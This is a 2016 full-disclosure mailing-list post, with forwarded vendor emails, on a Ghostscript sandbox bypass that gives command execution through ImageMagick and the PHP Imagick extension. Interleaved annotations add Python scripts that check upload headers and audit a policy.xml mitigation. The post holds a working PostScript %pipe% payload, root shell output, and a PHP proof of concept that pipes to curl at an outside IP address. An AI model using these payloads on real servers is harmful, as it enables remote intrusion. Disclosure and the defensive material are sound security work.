Message-ID: <CAPGxrc8oRSG3HiYshgZF0OauOwjZsrcB7KnFdOUvTMQ=uP3kcg@mail.gmail.com>
Date: Wed, 19 Oct 2016 15:37:32 +0800
From: redrain root <rootredrain@...il.com>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: [FD] Ghostscript sandbox bypass leads ImageMagick to remote code execution
Recently I noticed Tavis Ormandy reporting a vulnerability in Ghostscript:
-dSAFER mode could be ignored and lead to code execution. However, no one
had exploited it in an application. Here is a simple discussion and exploit
about it.
Author: redrain, yu.hong@...itin.com
Date: 2016-10-17
Version: Ghostscript version > 1.6
ImageMagick(or other app) all version
Vendor Notified: 2016-10-18
ImageMagick allows processing files with external libraries (delegates). There
are some delegates:
<delegate decode="eps" encode="pdf" mode="bi" command="&quot;gs&quot; -q
  -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
  &quot;-sDEVICE=pdfwrite&quot; &quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>
<delegate decode="eps" encode="ps" mode="bi" command="&quot;gs&quot; -q
  -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
  -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=ps2write&quot;
  &quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>
<delegate decode="ps" encode="eps" mode="bi" command="&quot;gs&quot; -q
  -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
  -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=epswrite&quot;
  &quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>
<delegate decode="ps" encode="pdf" mode="bi" command="&quot;gs&quot; -q
  -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
  -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pdfwrite&quot;
  &quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>
All of these delegates use Ghostscript (gs) to handle "pdf to eps",
"ps to eps", "eps to ps" and "pdf to ps", and all delegates use the
parameter -f; this parameter can lead Ghostscript to exec any command.
Ghostscript version: > 9.16
For example, the latest Ubuntu 16.10 Ghostscript package version is 9.19;
any user using ImageMagick on this system is vulnerable.
cat rr.pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
.putdeviceparams
quit
convert rr.pdf eps:rr
root@...rain-Parallels-Virtual-Platform:/tmp# convert rr.pdf eps:rr
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
convert: no images defined `eps:rr' @
error/convert.c/ConvertImageCommand/3253.
And there is an interesting thing: ImageMagick will automatically recognize
the file's real format from the file header and use the corresponding
delegate to handle it.
It also affects Imagick.
PoC:
<?php
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}
$exploit = <<<EOF
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl
108.61.160.217:12344)
.putdeviceparams
quit
EOF;
$thumb = new Imagick();
$thumb->readImageBlob($exploit);
Regards,
redrain
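The post's rr.pdf is PostScript with a .pdf name, and ImageMagick picks the coder (and so the gs delegate) from the header rather than the extension. The following is an added example, not code from the post or from ImageMagick: an application-side check that identifies an upload by its leading bytes, refuses anything that would reach a Ghostscript-backed coder, and rejects files whose real type disagrees with their extension. The magic prefixes, the extension table and the sample inputs are constructed for this example; the DISGUISED_PS sample only mimics the header of the post's file and carries no working payload.

```python
"""Magic-byte check for files before they are passed to ImageMagick.

Added example (not from the disclosure thread or ImageMagick). ImageMagick
chooses the coder from the file header, not the extension, so rr.pdf
containing PostScript is rendered by Ghostscript. Validate the real type
before calling convert and refuse anything a Ghostscript delegate would get.
"""
import os

# (format name, magic prefix). PDF and PS are listed so they can be named in
# the rejection reason; they are never in the default allow-list.
MAGIC = [
    ("PNG", b"\x89PNG\r\n\x1a\n"),
    ("JPEG", b"\xff\xd8\xff"),
    ("GIF", b"GIF87a"),
    ("GIF", b"GIF89a"),
    ("PDF", b"%PDF-"),
    ("PS", b"%!PS"),
]

# Extension -> format the uploader claims to be sending (constructed table).
EXT_FORMAT = {".png": "PNG", ".jpg": "JPEG", ".jpeg": "JPEG", ".gif": "GIF",
              ".pdf": "PDF", ".ps": "PS", ".eps": "PS"}

# Formats ImageMagick renders through the gs delegate (per the thread).
GS_BACKED = {"PDF", "PS"}


def sniff_format(data):
    """Identify a file by its leading bytes, the way a coder lookup would."""
    for name, magic in MAGIC:
        if data.startswith(magic):
            return name
    return None


def check_upload(filename, data, allowed=("PNG", "JPEG", "GIF")):
    """Return (ok, reason).

    ok is True only when the sniffed format is in `allowed` and agrees with
    the filename extension. Ghostscript-backed formats get an explicit reason
    so operators can see why a "PDF" upload was refused.
    """
    sniffed = sniff_format(data)
    claimed = EXT_FORMAT.get(os.path.splitext(filename)[1].lower())
    if sniffed is None:
        return False, "unrecognized header"
    if sniffed not in allowed:
        why = ("handed to Ghostscript by ImageMagick" if sniffed in GS_BACKED
               else "not in allow-list")
        return False, f"{sniffed} content: {why}"
    if claimed != sniffed:
        return False, f"extension says {claimed}, content is {sniffed}"
    return True, sniffed


# Constructed samples: a PostScript header under a .pdf name (the trick from
# the post, without any payload) and a minimal PNG header.
DISGUISED_PS = b"%!PS\ncurrentdevice null true mark /OutputICCProfile (...)\n"
PNG_HEAD = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, blob in (("rr.pdf", DISGUISED_PS), ("photo.png", PNG_HEAD),
                       ("photo.jpg", PNG_HEAD)):
        print(name, check_upload(name, blob))
```

Run it with no arguments to see the three constructed cases: the disguised PostScript is refused because its content is PS regardless of the .pdf name, the PNG passes, and a PNG uploaded as .jpg is refused for the extension mismatch. This is defence in depth only; the policy.xml denial further down the thread is the control that actually keeps PS/PDF away from gs.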
---------- Forwarded message ----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-19 1:47 GMT+08:00
Subject: Fwd: Security Issue
To: chris.liddell@...ifex.com
Hi Chris,
there is a vulnerability in Ghostscript; the ImageMagick security team
suggested I post it to your group.
Regards,
redrain
Forwarded conversation
Subject: Re: Security Issue
------------------------
From: <vir.prudens.non.contra.ventum.mingit@...gemagick.org>
Date: 2016-10-18 19:16 GMT+08:00
To: rootredrain@...il.com
We've seen this Ghostscript issue before and it was rerouted to the
Ghostscript maintainers. And it looks like the flaw in Ghostscript might be
fixed. We're using Ghostscript 9.20 and we get:
'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4
-dGraphicsAlphaBits=4 '-r72x72' -g612x792
'-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d'
'-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ'
./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id > /dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find
device profile
'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4
-dGraphicsAlphaBits=4 '-r72x72' -g612x792
'-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d'
'-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ' -c
showpage
./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id > /dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find
device profile
convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCommand/3253.
Until Ghostscript is upgraded under Ubuntu with the Ghostscript security
patch, you can add a security policy to ImageMagick's policy.xml to prevent
PostScript / PDF from being rendered:
<policy domain="coder" rights="none" pattern="PS" />
<policy domain="coder" rights="none" pattern="EPS" />
<policy domain="coder" rights="none" pattern="PDF" />
Now we get
convert -verbose rr.pdf eps:rr
convert: not authorized `rr.pdf' @ error/constitute.c/ReadImage/416.
convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCommand/3253.
The ImageMagick Security Team
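The policy above is the mitigation the thread settles on, so a practitioner will want to verify it is actually in effect on a host. The following is an added example, not code from the thread or from ImageMagick: it parses a policy.xml and reports which Ghostscript-backed coders are still allowed. It treats `pattern` as a case-insensitive glob and also expands `{a,b}` alternatives; that matching behaviour is an assumption about ImageMagick's policy lookup, chosen so that a catch-all pattern such as `*` is honoured. The two embedded policies are constructed samples, not copied from any distribution. Note that a pattern of `PS` does not match the separate coder names `PS2` and `PS3`, which is why the last check in the usage below passes a broader list.

```python
"""Report Ghostscript-backed coders that an ImageMagick policy.xml still allows.

Added example (not from the mailing-list thread or ImageMagick). Usage:
    python check_policy.py /etc/ImageMagick-6/policy.xml
"""
import fnmatch
import re
import sys
import xml.etree.ElementTree as ET

# The three coders the thread's policy denies. Callers can pass a longer
# list (PS2, PS3, XPS, ...) when they want to check those names too.
GS_CODERS = ("PS", "EPS", "PDF")


def _expand_braces(pattern):
    """Expand one {a,b,c} group into several plain glob patterns (recursive)."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if not m:
        return [pattern]
    head, tail = pattern[:m.start()], pattern[m.end():]
    out = []
    for alt in m.group(1).split(","):
        out.extend(_expand_braces(head + alt + tail))
    return out


def denied_coders(policy_xml, coders=GS_CODERS):
    """Return the subset of `coders` the policy denies outright.

    A coder counts as denied when some <policy domain="coder" rights="none">
    element has a pattern matching its name (glob, case-insensitive; this
    matching rule is an assumption of the example).
    """
    root = ET.fromstring(policy_xml)
    deny_patterns = []
    for pol in root.iter("policy"):
        if pol.get("domain", "").strip().lower() != "coder":
            continue
        if pol.get("rights", "").strip().lower() != "none":
            continue
        deny_patterns.extend(_expand_braces(pol.get("pattern", "")))
    denied = set()
    for coder in coders:
        if any(fnmatch.fnmatchcase(coder.upper(), p.upper()) for p in deny_patterns):
            denied.add(coder)
    return denied


def missing_denials(policy_xml, coders=GS_CODERS):
    """Coders from `coders` that the policy still allows, sorted."""
    return sorted(set(coders) - denied_coders(policy_xml, coders))


# Constructed sample policies (not copied from any distribution).
POLICY_DEFAULT = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="MVG" />
</policymap>
"""

POLICY_HARDENED = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="PDF" />
</policymap>
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            text = fh.read()
    else:
        text = POLICY_DEFAULT  # demo run against the constructed sample
    gaps = missing_denials(text, GS_CODERS + ("PS2", "PS3"))
    print("still allowed:", ", ".join(gaps) if gaps else "none")
```

Pointing the script at a host's policy.xml prints the coders that would still reach gs; an empty result for the list you care about is the state the ImageMagick team's reply describes. Remember that policy.xml lives per ImageMagick installation, so a vendored or statically built copy (the Imagick PHP extension on a different prefix, for example) needs its own check.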
----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-18 19:41 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org
[image: inline image 1]
root@...ntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64 -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-sDEVICE=pdfwrite -sOutputFile=1.eps -f /var/www/html/1.pdf
uid=0(root) gid=0(root) groups=0(root)
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC
profile failed
root@...ntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64
--version
9.20
root@...ntu:/opt/ghostscript-9.20-linux-x86_64#
Regards,
redrain
----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-18 19:45 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org
I guess you used the old gs version?
And this vulnerability affects versions > 9.16.
Regards,
redrain
2016-10-18 19:16 GMT+08:00 <vir.prudens.non.contra.ventum.mingit@...gemagick.org>:
----------
From: <vir.prudens.non.contra.ventum.mingit@...gemagick.org>
Date: 2016-10-18 19:50 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org,
rootredrain@...il.com
redrain root <rootredrain@...il.com> wrote:
> I guess u used the old gs version.?
> and this vulnerability affected version >9.16
We're using Ghostscript 9.20 which is > 9.16.
----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-18 20:11 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org
You can use
tar zxf a.tar.gz
cd sb
./a.sh
Then the command returns "uid=0(root) gid=0(root) groups=0(root)".
Regards,
redrain
----------
From: <vir.prudens.non.contra.ventum.mingit@...gemagick.org>
Date: 2016-10-18 21:08 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org,
rootredrain@...il.com
redrain root <rootredrain@...il.com> wrote:
> [image: inline image 1]
>
> root@...ntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64 -q
> -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
> -sDEVICE=pdfwrite -sOutputFile=1.eps -f /var/www/html/1.pdf
> uid=0(root) gid=0(root) groups=0(root)
> + ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC
> profile failed
> root@...ntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64
> --version
> 9.20
> root@...ntu:/opt/ghostscript-9.20-linux-x86_64#
>
It's likely the patch was against Ghostscript in Fedora 25. As mentioned,
in the meantime add a security policy to ImageMagick to prevent the use
of Ghostscript.
----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-18 21:19 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org
The latest Ghostscript is downloaded from http://www.ghostscript.com/
download/gsdnld.html and I'm trying to reproduce this vuln in different
distros; it works.
So do you consider this a valid vulnerability?
And another interesting thing is that I tried to exploit it in Imagick; it
looks to work well.
PoC:
<?php
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}
$exploit = <<<EOF
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl
108.61.160.217:12344)
.putdeviceparams
quit
EOF;
$thumb = new Imagick();
$thumb->readImageBlob($exploit);
Regards,
redrain
----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-18 21:38 GMT+08:00
To: 332746458@...com
Regards,
redrain
----------
From: <vir.prudens.non.contra.ventum.mingit@...gemagick.org>
Date: 2016-10-18 22:21 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org,
rootredrain@...il.com
redrain root <rootredrain@...il.com> wrote:
> the latest ghostscript is downloaded from
> http://www.ghostscript.com/download/gsdnld.html and i'm trying to
> reproduce
This appears to be a Ghostscript vulnerability. Post to the Ghostscript
developers group. We can't fix a Ghostscript vulnerability and our only
suggestion is an ImageMagick security policy that prevents the use of
Ghostscript until the vulnerability is fixed in Ghostscript.